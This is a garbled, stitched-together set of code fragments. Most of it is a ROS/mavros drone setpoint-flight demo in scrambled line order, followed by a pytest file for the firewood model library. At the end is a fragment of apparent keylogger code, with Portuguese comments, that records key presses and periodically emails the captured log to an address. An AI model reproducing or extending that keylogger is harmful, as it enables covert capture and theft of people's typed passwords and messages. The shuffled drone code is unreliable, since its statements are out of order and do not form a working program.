"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND",
"AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY,",
"self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True)",
"Author: <NAME> <<EMAIL>> # * # * Redistribution and use in source and",
"\"Error: Unable to start thread\" # TODO(simon): Clean this up. self.done = False",
"wait) i = i + 1 rate.sleep() if (i > sides): print \"Fly",
"the names of its contributors may be # * used to endorse or",
"POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy import thread import",
"False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate =",
"rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0,",
"+ offset_y z = offset_z wait = False delay = 0 if (i",
"Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0,",
"= 10.0 sides = 360 radius = 20 print \"Fly in a circle\"",
"other materials provided with the # * distribution. # * 3. Neither the",
"#!/usr/bin/env python # vim:set ts=4 sw=4 et: # # # **************************************************************************** # *",
"class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x",
"-0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo() except rospy.ROSInterruptException: pass",
"# # **************************************************************************** # * # * Copyright (c) 2015 UAVenture AG. All",
"OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS;",
"quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x,",
"0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly",
"print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing.",
"y, z, delay=0, wait=True): self.done = False self.x = x self.y = y",
"# * notice, this list of conditions and the following disclaimer. # *",
"# * notice, this list of conditions and the following disclaimer in #",
"(i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate",
"0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5:",
"# * modification, are permitted provided that the following conditions # * are",
"msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes we will lock",
"# * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE",
"i == sides): # Let it reach the setpoint. wait = True delay",
"the setpoint. wait = True delay = 5 setpoint.set(x, y, z, delay, wait)",
"LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED",
"A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT",
"thread\" # TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event() sub",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF",
"setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0",
"vim:set ts=4 sw=4 et: # # # **************************************************************************** # * # * Copyright",
"reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) <",
"0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__':",
"the following conditions # * are met: # * # * 1. Redistributions",
"Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x =",
"SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to",
"self.y msg.pose.position.z = self.z # For demo purposes we will lock yaw/heading to",
"UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>> # * #",
"notice, this list of conditions and the following disclaimer in # * the",
"std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy):",
"to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0,",
"(c) 2015 UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>> #",
"rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\"",
"ARISING IN # * ANY WAY OUT OF THE USE OF THIS SOFTWARE,",
"= 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error:",
"#print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and",
"Clean this up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped,",
"# Climb to the starting height first i = 0 while not rospy.is_shutdown():",
"self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped,",
"the documentation and/or other materials provided with the # * distribution. # *",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO,",
"following disclaimer. # * 2. Redistributions in binary form must reproduce the above",
"its contributors may be # * used to endorse or promote products derived",
"offset_x y = radius * sin(i*2*pi/sides) + offset_y z = offset_z wait =",
"this list of conditions and the following disclaimer in # * the documentation",
"written permission. # * # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT",
"self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header =",
"\"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\"",
"sw=4 et: # # # **************************************************************************** # * # * Copyright (c) 2015",
"wait = False delay = 0 if (i == 0 or i ==",
"to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0",
"= 5 setpoint.set(x, y, z, delay, wait) i = i + 1 rate.sleep()",
"OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES",
"\"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0,",
"IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED",
"INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND",
"yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True):",
"yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw)",
"from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import String from",
"copyright # * notice, this list of conditions and the following disclaimer. #",
"provided that the following conditions # * are met: # * # *",
"0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try:",
"from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class",
"start thread\" # TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event()",
"# * used to endorse or promote products derived from this software #",
"not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y = radius *",
"* used to endorse or promote products derived from this software # *",
"def set(self, x, y, z, delay=0, wait=True): self.done = False self.x = x",
"BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER",
"in binary form must reproduce the above copyright # * notice, this list",
"5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0,",
"* are met: # * # * 1. Redistributions of source code must",
"rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break",
"Redistributions of source code must retain the above copyright # * notice, this",
"Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y",
"> sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a",
"PoseStamped, Quaternion from math import * from mavros.srv import CommandBool from mavros.utils import",
"= y self.z = z if wait: rate = rospy.Rate(5) while not self.done:",
"setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0,",
"binary form must reproduce the above copyright # * notice, this list of",
"derived from this software # * without specific prior written permission. # *",
"Climb to the starting height first i = 0 while not rospy.is_shutdown(): x",
"we will lock yaw/heading to north. yaw_degrees = 0 # North yaw =",
"delay=0, wait=True): self.done = False self.x = x self.y = y self.z =",
"self.z # For demo purposes we will lock yaw/heading to north. yaw_degrees =",
"from this software # * without specific prior written permission. # * #",
"* cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y z =",
"= 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y",
"rospy self.x = 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate,",
"OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL,",
"LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A",
"y = radius * sin(i*2*pi/sides) + offset_y z = offset_z wait = False",
"nor the names of its contributors may be # * used to endorse",
"# * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # *",
"permission. # * # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS",
"WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)",
"THE # * POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy",
"0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides",
"= False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate",
"(i == 0 or i == sides): # Let it reach the setpoint.",
"names of its contributors may be # * used to endorse or promote",
"following disclaimer in # * the documentation and/or other materials provided with the",
"must reproduce the above copyright # * notice, this list of conditions and",
"may be # * used to endorse or promote products derived from this",
"z, delay=0, wait=True): self.done = False self.x = x self.y = y self.z",
"# * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED #",
"= rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z,",
"3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0,",
"reproduce the above copyright # * notice, this list of conditions and the",
"import PoseStamped, Quaternion from math import * from mavros.srv import CommandBool from mavros.utils",
"thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math import",
"\"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0,",
"= offset_z wait = False delay = 0 if (i == 0 or",
"reach the setpoint. wait = True delay = 5 setpoint.set(x, y, z, delay,",
"= z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def",
"= radius * sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay",
"IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. # * #",
"# **************************************************************************** # * # * Copyright (c) 2015 UAVenture AG. All rights",
"= rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0,",
"OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"OR OTHERWISE) ARISING IN # * ANY WAY OUT OF THE USE OF",
"- self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z -",
"setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5)",
"self.navigate, () ) except: print \"Error: Unable to start thread\" # TODO(simon): Clean",
"IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE",
"reserved. # * Author: <NAME> <<EMAIL>> # * # * Redistribution and use",
"CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"False self.x = x self.y = y self.z = z if wait: rate",
"circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first i",
"WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED.",
"OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT",
"self.pub = pub self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z",
"this up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached)",
"* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED",
"pub, rospy): self.pub = pub self.rospy = rospy self.x = 0.0 self.y =",
"the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z",
"0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5)",
"rospy import thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from",
"self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done = False self.x",
"# * distribution. # * 3. Neither the name PX4 nor the names",
"OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"= Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done =",
"Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done = False",
"5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\" setpoint.set(10.0,",
"EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. # *",
"cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y z = offset_z",
"# * Author: <NAME> <<EMAIL>> # * # * Redistribution and use in",
"# * # * Redistribution and use in source and binary forms, with",
"1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5)",
"10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now()",
"# * # * Copyright (c) 2015 UAVenture AG. All rights reserved. #",
"time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x -",
"setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint =",
"this software # * without specific prior written permission. # * # *",
"= self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\"",
"list of conditions and the following disclaimer. # * 2. Redistributions in binary",
"and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT",
"i = 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x",
"5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0",
"= self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes we",
"self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10)",
"* distribution. # * 3. Neither the name PX4 nor the names of",
"radius * sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay =",
"self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp",
"the following disclaimer. # * 2. Redistributions in binary form must reproduce the",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR",
"msg.pose.position.z = self.z # For demo purposes we will lock yaw/heading to north.",
"* # **************************************************************************** import rospy import thread import threading import time from geometry_msgs.msg",
"in source and binary forms, with or without # * modification, are permitted",
"OTHERWISE) ARISING IN # * ANY WAY OUT OF THE USE OF THIS",
"self.x = x self.y = y self.z = z if wait: rate =",
"* without specific prior written permission. # * # * THIS SOFTWARE IS",
"def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header()",
"except: print \"Error: Unable to start thread\" # TODO(simon): Clean this up. self.done",
"import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy =",
"2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__",
"threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz",
"msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x =",
"offset_z wait = False delay = 0 if (i == 0 or i",
"setpoint. wait = True delay = 5 setpoint.set(x, y, z, delay, wait) i",
"and use in source and binary forms, with or without # * modification,",
"self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y -",
"Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print",
"* from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import Header",
"0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0,",
"self.done = False self.x = x self.y = y self.z = z if",
"right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0,",
"True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate =",
"* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR",
"Neither the name PX4 nor the names of its contributors may be #",
"= rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z",
"# * Copyright (c) 2015 UAVenture AG. All rights reserved. # * Author:",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED",
"2015 UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>> # *",
"thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start thread\" # TODO(simon):",
"setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ ==",
"with the # * distribution. # * 3. Neither the name PX4 nor",
"0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo() except rospy.ROSInterruptException:",
"binary forms, with or without # * modification, are permitted provided that the",
"offset_y = 0.0 offset_z = 10.0 sides = 360 radius = 20 print",
"= False delay = 0 if (i == 0 or i == sides):",
"CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT",
"abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub =",
"* Copyright (c) 2015 UAVenture AG. All rights reserved. # * Author: <NAME>",
"of its contributors may be # * used to endorse or promote products",
"tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy",
"and the following disclaimer in # * the documentation and/or other materials provided",
"mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations",
"self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print",
"- self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) <",
"are permitted provided that the following conditions # * are met: # *",
"disclaimer. # * 2. Redistributions in binary form must reproduce the above copyright",
"1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if",
"= PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1:",
"python # vim:set ts=4 sw=4 et: # # # **************************************************************************** # * #",
"i + 1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0,",
"* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY",
"* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #",
"WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE",
"source code must retain the above copyright # * notice, this list of",
"SUCH DAMAGE. # * # **************************************************************************** import rospy import thread import threading import",
"THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE.",
"software # * without specific prior written permission. # * # * THIS",
"setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo() except",
"0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable",
"abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y)",
"= 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to start",
"import * from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import",
"self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self):",
"rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0,",
"import thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math",
"a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first",
"of source code must retain the above copyright # * notice, this list",
"= radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y",
"not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z)",
"and/or other materials provided with the # * distribution. # * 3. Neither",
"= 0.0 offset_y = 0.0 offset_z = 10.0 sides = 360 radius =",
"* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # *",
"self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z)",
"the # * distribution. # * 3. Neither the name PX4 nor the",
"* Author: <NAME> <<EMAIL>> # * # * Redistribution and use in source",
"OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # *",
"north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0,",
"z = offset_z wait = False delay = 0 if (i == 0",
"yaw/heading to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion =",
"and the following disclaimer. # * 2. Redistributions in binary form must reproduce",
"+ offset_x y = radius * sin(i*2*pi/sides) + offset_y z = offset_z wait",
"OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #",
"slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0,",
"AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO,",
"THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,",
"\"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y =",
"0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo():",
"from math import * from mavros.srv import CommandBool from mavros.utils import * from",
"PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x",
"0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5)",
"# * # * 1. Redistributions of source code must retain the above",
"0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the",
"__init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x = 0.0 self.y",
"PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR",
"North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg)",
"mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg",
"if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and",
"msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes",
"PX4 nor the names of its contributors may be # * used to",
"* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS #",
"forms, with or without # * modification, are permitted provided that the following",
"x = radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) +",
"= \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y",
"quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy",
"= False self.x = x self.y = y self.z = z if wait:",
"() ) except: print \"Error: Unable to start thread\" # TODO(simon): Clean this",
"0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0,",
"360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3)",
"NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR",
"* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # *",
"x self.y = y self.z = z if wait: rate = rospy.Rate(5) while",
"0.0, 10.0, 3) # Climb to the starting height first i = 0",
"while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z -",
"use in source and binary forms, with or without # * modification, are",
"height first i = 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides)",
"INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER IN",
"home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0,",
"wait = True delay = 5 setpoint.set(x, y, z, delay, wait) i =",
"navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id",
"= 0 if (i == 0 or i == sides): # Let it",
"products derived from this software # * without specific prior written permission. #",
"will lock yaw/heading to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees)",
"to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0,",
"# 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp =",
"* # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y",
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT OF THE",
"PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY",
"# * Redistribution and use in source and binary forms, with or without"
] |
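
The demo above only streams position setpoints; it imports CommandBool but never arms the vehicle, which a real flight would require before offboard setpoints take effect. A minimal sketch of an arming helper, assuming the arming service lives at /mavros/cmd/arming with the CommandBool type imported above (the service path, and the package providing CommandBool, changed in later mavros releases, which moved it to mavros_msgs.srv):

def arm(state):
    # Sketch only: the service name and srv package are assumptions that
    # vary across mavros versions.
    rospy.wait_for_service('/mavros/cmd/arming')
    try:
        arming = rospy.ServiceProxy('/mavros/cmd/arming', CommandBool)
        resp = arming(value=state)  # True arms, False disarms
        return resp.success
    except rospy.ServiceException as e:
        print "Arming service call failed: %s" % e
        return False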

import importlib
import sys

import pytest

from firewood import models

gan = ["gan." + model for model in models.gan.__all__]
semantic_segmentation = [
    "semantic_segmentation." + model for model in models.semantic_segmentation.__all__
]
all_models = gan + semantic_segmentation


@pytest.mark.parametrize("model", all_models)
def test_models(model: str) -> None:
    module = importlib.import_module("firewood.models." + model)
    sys.argv = [""]
    module.main()
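
This test assumes every name listed in models.gan.__all__ and models.semantic_segmentation.__all__ resolves to a submodule exposing a main() entry point; sys.argv is reset so an argparse-based main() does not see pytest's own command-line flags. The same import dance can be reproduced outside pytest, for example to debug a single failing model (the dotted model name below is hypothetical):

import importlib
import sys

sys.argv = [""]  # hide the real CLI arguments from the model's main()
module = importlib.import_module("firewood.models.gan.DCGAN")  # hypothetical name
module.main()

Within pytest itself, -k narrows the parametrized run the same way, e.g. `pytest -k semantic_segmentation`.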
[
"variável \"self.log\" \"\"\" if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS,",
"linha sempre que um ENTER for pressionado name = \"[ENTER]\\n\" elif name ==",
"um método após uma quantidade de tempo \"intervalo\" from threading import Semaphore, Timer",
